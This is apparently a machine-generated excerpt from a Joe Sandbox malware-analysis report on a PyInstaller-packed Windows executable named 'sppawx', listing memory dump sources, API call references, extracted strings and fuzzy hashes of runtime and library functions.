                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 349153199-0
                                                                                                                                                                                                                              • Opcode ID: edd2dffeb58312717817d9a95534815d5d46ae94dbed4835cd8b920937bfe9e7
                                                                                                                                                                                                                              • Instruction ID: 833a013acd426542daec68a1eb96168ffd76893beb996a0bb966b86b7059e7fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: edd2dffeb58312717817d9a95534815d5d46ae94dbed4835cd8b920937bfe9e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22819B20E1C64386FA74AB699441A7D62A0EFC5B80F5C443FDA4C47FB6FE2DE9458310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 349153199-0
                                                                                                                                                                                                                              • Opcode ID: f483b21f41d815f6d6d63f0a13c87fd0f68ae68320ff496c1413c579ba159f5c
                                                                                                                                                                                                                              • Instruction ID: e3e66b7dd99e532136e23052e0d0326103b2132e695fbd6b3f0a62c64279ea20
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f483b21f41d815f6d6d63f0a13c87fd0f68ae68320ff496c1413c579ba159f5c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9381AF31E0C643AAF670AB669481ABD62A0AFD57A0F1C5037D94D47FB6FE3CE9458700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: b204774df767de4cc455d83b663f4b1b948884128e14486b2bb680a5435abb2f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E127F62E0E14386FB74BA25A154679F692FF40750FD4C17DEE9A46AC4DF3CE5808B20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction ID: 855a4d690a0ad25160f0d1e234178d31203c7a63648245964dd0b59980ceeac7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B126132E0E14386FF70BA25A25467AF662FB80754FD8407DEF99469C4DB7DE4808B60
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 88369a8d2ade53b1397bf66df6471b9bdc2045f6400eebad8fbd2a5e1e1acbe3
                                                                                                                                                                                                                              • Instruction ID: d9a40c6133c7709e453d0ba19bfdb75d33054329388b94ad67079dad1ffceb43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88369a8d2ade53b1397bf66df6471b9bdc2045f6400eebad8fbd2a5e1e1acbe3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86418E61B0A65292FA20FB32A8046B9F390BF45BC4FC444BEED0D07796DE3CE5058760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF79A313CBB), ref: 00007FF79A3188F4
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF79A313CBB), ref: 00007FF79A3188FA
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00007FF79A313CBB), ref: 00007FF79A31893C
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318A20: GetEnvironmentVariableW.KERNEL32(00007FF79A31388E), ref: 00007FF79A318A57
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79A318A79
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A3282A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3282C1
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312810: MessageBoxW.USER32 ref: 00007FF79A3128EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
                                                                                                                                                                                                                              • Instruction ID: 92834b5379f009da7cd5e9f734dce4119e060e99588c96a2d9a013f169ec9d6b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F41BE11B0B64251FA30FB32A8552F9B291AF89BC4FC002BDED0D4779AEE3CE5018760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction ID: f474149996b6a1c347da7fb6d685d38051a96b22233f299b68f64eb1c7eb1aea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0D16B22A097418AFB20EB3594803BDB7A0FB45788FA0417EEE4D57B95DF39E081C760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007C53420ErrorLast
                                                                                                                                                                                                                              • String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
                                                                                                                                                                                                                              • API String ID: 2011160099-502574948
                                                                                                                                                                                                                              • Opcode ID: 4c2e6772690861a5a0206d813afd3d798138ea416ca04513dbf9d65ad58d7885
                                                                                                                                                                                                                              • Instruction ID: 5ab3aa93ff43aff4fae7a08dedf1296161e9b96f31df06c893ea109f5837e25a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c2e6772690861a5a0206d813afd3d798138ea416ca04513dbf9d65ad58d7885
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A915061A9C69282FA60AB19E5517BE6250EF84BC4F484033EB4D47FB6DE3CE447D702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF79A32F11A,?,?,0000018C7E748788,00007FF79A32ADC3,?,?,?,00007FF79A32ACBA,?,?,?,00007FF79A325FAE), ref: 00007FF79A32EEFC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF79A32F11A,?,?,0000018C7E748788,00007FF79A32ADC3,?,?,?,00007FF79A32ACBA,?,?,?,00007FF79A325FAE), ref: 00007FF79A32EF08
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction ID: ea1248759f8e7edf585890b3fb33f1e4769a3801da29d36e3f60c88f36506d56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E41F221B1AA1241FA35EB32A804575B791BF49BA4FE8417DED1D47784EF3CE4048360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Ioctl
                                                                                                                                                                                                                              • String ID: invalid ioctl command %lu$k(kkk):ioctl$kI:ioctl$kO:ioctl
                                                                                                                                                                                                                              • API String ID: 3041054344-4238462244
                                                                                                                                                                                                                              • Opcode ID: 927c9b886349e2f6320387c9c7db8abdccd2030edac8569247d3ffb36c545990
                                                                                                                                                                                                                              • Instruction ID: 946bd8db5711588d30d5e094147930df4d4cb9060a3ccb608b81c8833224da44
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 927c9b886349e2f6320387c9c7db8abdccd2030edac8569247d3ffb36c545990
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF510832A18B42A9E770CB64E8405ED77B0FB88768F584136EA4E93E68EF38D555C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF79A312D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction ID: f874663e905ea0a42771c04dbbe135fa9c96c8189b78b5e59d2757a39e82fc7d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D931B422B09B4142F630FB76B8442AAB695BF88798F80013DEF4D97B59DE3CD506C310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDBD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDCB
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDF5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DE63
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DE6F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction ID: 1f0bd83040a55d53c6d5b4b6819bfb02be1bffa582e94192a484a4dc266990fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C316A21B1BA4291FE32EB22A800965B394FF59BE1FD9457DED1D46394EF3CE4448230
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF79A31351A,?,00000000,00007FF79A313F23), ref: 00007FF79A312AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction ID: 366ca9ae1c83fe915555ca5047e42d73b1c72a33ed67f77454b9a75b4c914870
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85217F32A1A78182F670EB61B8817E6B394FB88784F80017EFE8C43659DF7CD6458750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
